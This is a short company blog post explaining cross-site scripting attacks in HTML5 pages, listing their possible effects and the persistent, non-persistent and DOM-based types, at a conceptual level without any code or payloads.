Blog

Twitter Feeds

March 2019
SSMTWTF
« Jan  
 1
2345678
9101112131415
16171819202122
23242526272829
3031 

What is Cross-site Scripting Attack (XSS)?

Cross-site scripting attack is also possible for vulnerable HTML5 web applications, because Same-Origin policy is not changed for embedded scripts. For instance, if an attacker has access to embed evil codes, no difference can be identified between HTML5 and old versions of HTML. Evil code may embed to the content through forms using <script> element or embedding in-line JavaScript into event handler attributes and this depend on the filter that bypasses in that web-page.

  

Possible Malicious Actions

JavaScript does not have any restrictions for embedding or injection codes, therefore an attacker can do a lot of actions, such as:

  • Cookie and Session Hijacking
  • Clickjacking
  • Redirection visitor to another place
  • Creating DoS (Denial-of-Service) and DDos (Distributed Denial-of-Service) attacks.
  • Scanning Internal Network
  • And more

  

Attacking Models

  • Type I – Persistent XSS: if an attacker is able to bypass user input validation or an attacker is able to execute malicious SQL query while performing SQL injection attack then malicious content can be injected which leads to persistent XSS attack or Type I XSS attack.
  • Type II – Non-Persistent XSS: if an attacker can trick user to click on malicious URL that holds payload of non-persistent XSS attack, then the malicious code will be included within HTTP response thus browser will execute it.
  • DOM Based XSS: is similar to Non-persistent XSS, but the response is not holding any payload. Code injection occurs inside user’s browser because the exploit depends on Client-side vulnerabilities.

 

Injected Malicious code will be executed inside HTML5 pages, but this is not a weak point for HTML5 because once the script injected, browser will execute it according to Cross-origin embedding policy. Also, there are no measures to distinguish between malicious code and trusted code when they are received from the same origin, then browser will execute all loaded scripts under the same privilege according to Same-origin policy.

Any malicious code if injected in form of embedded script or in-line script will be executed by browser for all types of HTML documents like HTML5 and previous versions, thus attacker can perform any action based on injected code, to perform malicious actions that is allowed by Same-origin policy in that web-page.

Leave a comment



Suncode IT Solutions

2 years ago

Nice blog!

suncode-logo-footer

We are an IT Solutions and Consultancy company based in Erbil, we provide a high quality web development, designing and IT consulting services . We totally fathom the customer requirements and assist them to accomplish their ultimate business objectives.

 

Contact Info

  • No 144, Dar u Asn (Hadid u Khashab) Ave. Shoresh, Erbil, Iraqi Kurdistan
  • +964 750 555 1 999
  • inPROTECTED-EMAILfo@suncode.co

Follow Us